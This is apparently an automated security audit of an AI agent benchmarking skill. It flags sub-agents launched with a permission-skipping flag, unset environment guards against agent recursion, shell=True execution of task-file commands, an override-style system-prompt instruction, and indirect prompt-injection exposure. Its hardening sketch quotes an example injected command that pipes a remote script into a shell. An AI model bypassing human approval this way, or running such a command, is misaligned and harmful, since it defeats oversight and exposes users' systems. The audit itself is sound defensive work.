
skill-benchmark

Warn

Audited by Gen Agent Trust Hub on Mar 25, 2026

Risk Level: MEDIUM
COMMAND_EXECUTION · REMOTE_CODE_EXECUTION · PROMPT_INJECTION
Full Analysis
  • [COMMAND_EXECUTION]: The skill executes sub-sessions using claude -p with the --dangerously-skip-permissions flag in SKILL.md and agents/runner.md. This bypasses the platform's standard requirement for human approval of tool use, allowing the sub-agent to perform file operations and shell commands autonomously.
  • [COMMAND_EXECUTION]: In agents/runner.md, the skill explicitly unsets protection environment variables (env -u CLAUDECODE -u CLAUDE_CODE_ENTRYPOINT) to bypass restrictions intended to prevent infinite agent recursion and uncontrolled execution chains.
  • [REMOTE_CODE_EXECUTION]: The scripts/run_checks.py script uses subprocess.run(cmd, shell=True) to execute arbitrary shell commands extracted from the runs_without_error section of benchmark task markdown files. This creates a significant execution surface for arbitrary commands if the task definition files are manipulated or incorrectly generated.
  • [PROMPT_INJECTION]: The skill uses the --append-system-prompt flag in agents/runner.md to force sub-sessions to load the skill under test. While this is intended for methodology consistency, the specific instruction pattern used ('IMPORTANT: Before starting any work, you MUST...') mimics common prompt-injection override tactics.
  • [INDIRECT_PROMPT_INJECTION]: The skill is susceptible to indirect injection because it reads and analyzes the full content of external SKILL.md files to generate its own benchmarking tasks.
      ◦ Ingestion points: In SKILL.md Step 2, the agent reads the complete target skill file to extract domains and capabilities.
      ◦ Boundary markers: There are no boundary markers or instructions to ignore embedded commands when processing the target skill's content.
      ◦ Capability inventory: The skill has access to Bash (read/write/execute), the Agent tool (launching graders), and the ability to run unrestricted sub-sessions via claude -p.
      ◦ Sanitization: The skill does not sanitize or validate instructions extracted from the target skill before using them to auto-generate tasks, potentially allowing a malicious skill to influence the benchmark generator.
  • [DYNAMIC_EXECUTION]: The benchmarking process involves dynamic generation of task files in Step 3 which are then processed by execution and grading scripts, creating multiple points where instructions from data are converted into executable actions.
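To illustrate the REMOTE_CODE_EXECUTION finding, the following is a hypothetical hardening sketch for the subprocess.run(cmd, shell=True) pattern described above. The internals of scripts/run_checks.py are not reproduced here; the function name run_check and the allowlist are illustrative assumptions. Splitting the command string with shlex and running with shell=False means shell metacharacters such as ';' and '&&' are passed as literal arguments rather than interpreted as command separators.

```python
import shlex
import subprocess

# Assumed allowlist for illustration only; not taken from the audited code.
ALLOWED_BINARIES = {"echo", "python", "pytest"}

def run_check(cmd: str) -> subprocess.CompletedProcess:
    """Run a command string from a task file without invoking a shell."""
    argv = shlex.split(cmd)
    if not argv or argv[0] not in ALLOWED_BINARIES:
        raise ValueError(f"command not allowed: {cmd!r}")
    # shell=False executes argv[0] directly; an injected '; rm -rf ~'
    # remains an inert argument instead of becoming a second command.
    return subprocess.run(
        argv, shell=False, capture_output=True, text=True, timeout=300
    )
```

With shell=True, a manipulated runs_without_error entry like "echo ok; curl evil.sh | sh" would execute both commands; with the sketch above, the entire suffix is just arguments to echo.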
Audit Metadata
Risk Level
MEDIUM
Analyzed
Mar 25, 2026, 04:21 AM